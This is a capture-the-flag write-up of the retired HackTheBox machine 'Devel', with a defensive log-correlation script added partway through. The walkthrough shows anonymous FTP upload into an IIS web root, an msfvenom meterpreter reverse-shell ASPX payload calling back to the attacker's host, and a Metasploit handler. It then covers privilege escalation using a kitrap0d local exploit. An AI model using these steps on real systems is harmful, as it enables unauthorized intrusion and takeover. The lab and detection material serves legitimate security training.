Devel From HackTheBox

Ftp & windows fun

hac#
InfoSec Write-ups


Hello everyone, this is Hac. Today we will be doing Devel from HackTheBox, which is an easy retired Windows box with an interesting foothold that might be helpful in attack-and-defense style war games, for example HackTheBox Battlegrounds. So without wasting any time, let’s start hacking.

We will start with a quick nmap scan:

$ sudo nmap -sC -sV -p- 10.129.108.142 -oA nmap_all --min-rate 10000
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-25 02:35 EDT
Nmap scan report for 10.129.108.142
Host is up (0.082s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.67 seconds

So there are two services up and running: FTP and an IIS web server. Anonymous login is allowed on FTP, so let’s check it first, because we might find some juicy information like a clear-text password for something, or we may be able to upload files over FTP, which could give us a low-privileged shell.

[Screenshot: checking FTP on port 21]
[Screenshot: uploading a.txt to the FTP server]

I was able to upload a file called “a.txt” and then access it from the web server, which means the FTP root is the web root and we can get a shell by uploading an .aspx file. You may be wondering why .aspx and not PHP or anything else? This is because it’s a Windows box running Microsoft IIS, and PHP is not supported by default. Also, from the recon we learned about a directory called “aspnet_client”, which points to ASP.NET.

[Screenshot: the aspnet_client directory]

Checking a.txt just to make sure that we are able to access it from the web server.

Now I tried to create a reverse shell with msfvenom. First I tried the “.asp” extension, but when I uploaded the shell and tried to access it from the web server, I got a “500 Internal Server Error”. So I created the payload with the “.aspx” extension instead, and it worked: I got a reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=6969 -f aspx > shell.aspx

Then I uploaded the final payload to the FTP server and tried to access it from the web server.

[Screenshot: uploading shell.aspx to the FTP server]
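From a defender’s side, the foothold above (anonymous FTP writable into the IIS web root) leaves a clear trace: a successful FTP STOR of a script file followed shortly by an HTTP request for the same file name. The following is an added example, not code from the original writeup; it correlates the two events in W3C-style logs as IIS writes them, with constructed sample log lines and a hypothetical one-hour correlation window.

```python
"""Correlate FTP uploads of script files with later web requests for the
same file name (IIS W3C-style logs). Sample data below is constructed."""
from datetime import datetime
from pathlib import PurePosixPath

# Extensions IIS will execute server-side if uploaded into the web root.
SCRIPT_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp"}

# Constructed sample logs (not the box's real logs); field order is given
# by the #Fields header, as in W3C extended logging.
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2022-10-25 06:34:10 10.10.14.16 anonymous STOR /a.txt 226
2022-10-25 06:40:02 10.10.14.16 anonymous STOR /shell.aspx 226
2022-10-25 06:41:00 10.10.14.16 anonymous STOR /bad.aspx 550
"""
WEB_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2022-10-25 06:34:30 10.10.14.16 GET /a.txt 200
2022-10-25 06:40:20 10.10.14.16 GET /shell.aspx 200
2022-10-25 06:41:30 10.10.14.16 GET /bad.aspx 404
"""

def parse_w3c(text):
    """Parse a W3C extended log into dicts keyed by the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def _ts(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")

def find_upload_then_exec(ftp_log, web_log, window_s=3600):
    """Return (filename, ftp_user, http_status) for every successful (2xx)
    FTP STOR of a script-extension file that was requested over HTTP within
    window_s seconds afterwards. Failed uploads (e.g. 550) are ignored."""
    uploads = [r for r in parse_w3c(ftp_log)
               if r["cs-method"] == "STOR" and r["sc-status"].startswith("2")
               and PurePosixPath(r["cs-uri-stem"]).suffix.lower() in SCRIPT_EXT]
    requests = parse_w3c(web_log)
    hits = []
    for up in uploads:
        name = PurePosixPath(up["cs-uri-stem"]).name
        for req in requests:
            delta = (_ts(req) - _ts(up)).total_seconds()
            if PurePosixPath(req["cs-uri-stem"]).name == name and 0 <= delta <= window_s:
                hits.append((name, up["cs-username"], req["sc-status"]))
    return hits
```

Only shell.aspx is reported: a.txt has no executable extension, and the bad.aspx upload never succeeded.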

We need to do a little setup in msfconsole in order to catch the shell. BTW, you can also catch the shell with netcat if you are a 1337 hacker.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 6969
LPORT => 6969
msf6 exploit(multi/handler) > run

Now let’s go back to the web server to trigger our payload.

[Screenshot: visiting shell.aspx]

And………. we got a reverse shell, let’s gooooooooooooo

[Screenshot: we got a shell]

It’s time to escalate our privileges to root and completely pwn this box.

Let’s start with basic system enumeration by running the “systeminfo” command and exploring the file system, looking for passwords or anything else that is informative.

c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 μμ
System Boot Time: 25/10/2022, 9:32:47 πμ
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.419 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.516 MB
Virtual Memory: In Use: 625 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Local Area Connection 4
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.108.142
[02]: fe80::84e5:a926:a7b4:20d4
[03]: dead:beef::5005:9eb9:f501:6af
[04]: dead:beef::84e5:a926:a7b4:20d4

Hmm, from the output of the “systeminfo” command we got the hostname, OS version and system architecture, and we can see that no hotfixes are installed; we will note these down because they might be helpful. Now let’s try “local_exploit_suggester”, which is a post module of Metasploit.

[Screenshot: local_exploit_suggester output]

First I tried “exploit/windows/local/bypassuac_eventvwr”, but it failed. So I tried “exploit/windows/local/ms10_015_kitrap0d”, which worked, and I was able to escalate my privileges to root.

[Screenshot: ms10_015_kitrap0d]

Of course there are many ways to get root on this box, but this one was the easiest. There are also alternatives to “local_exploit_suggester”, like https://github.com/AonCyberLabs/Windows-Exploit-Suggester, but in this writeup I tried to keep things simple.

I hope you liked it :)
